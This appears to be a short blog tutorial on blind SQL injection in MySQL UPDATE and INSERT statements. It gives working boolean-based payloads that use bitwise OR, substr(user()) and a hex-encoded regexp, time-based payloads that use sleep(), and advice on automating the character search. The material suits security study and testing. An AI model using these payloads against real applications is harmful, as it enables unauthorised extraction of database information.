I’m not going to explain or write about blind injection in general. There are enough resources on the internet where you can learn. You can check my previous post where I have explained in detail about other types of injections in these statements. Since some of you asked me how to perform blind injection I thought of writing this post.
Boolean Based Blind Injection
We can use ‘+’ or bitwise OR in this scenario. If the result is true the entry will be updated with a ‘1’ and if the result is false the entry will be updated with a ‘0’.
I’m using binary search to make the search faster. Mid = (max+min)/2.
However I’m not sure if this is realistic.
update users set username = ‘0’ | (substr(user(),1,1) regexp 0x5e5b6d2d7a5d) where id=14;
insert into users values (15,’osanda’,'0'| (substr(user(),1,1) regexp 0x5e5b6d2d7a5d));
Time Based Blind Injection
This approach would be realistic. In this case we can use functions such as sleep(), benchmark(). Like before by using ‘+’ or bitwise OR we can know if the result is true or false when updated or inserted.
update users set username = '0'|if((substr(user(),1,1) regexp 0x5e5b6d2d7a5d), sleep(5), 1) where id=15;
insert into users values (16,’osanda’,'0'| if((substr(user(),1,1) regexp 0x5e5b6d2d7a5d), sleep(5), 1));
The same can be applied to DELETE statements as well, but the injection is not realistic. There are many methods you can follow using the above syntax. You can develop your own tool to automate this process and improve the efficiency of the search.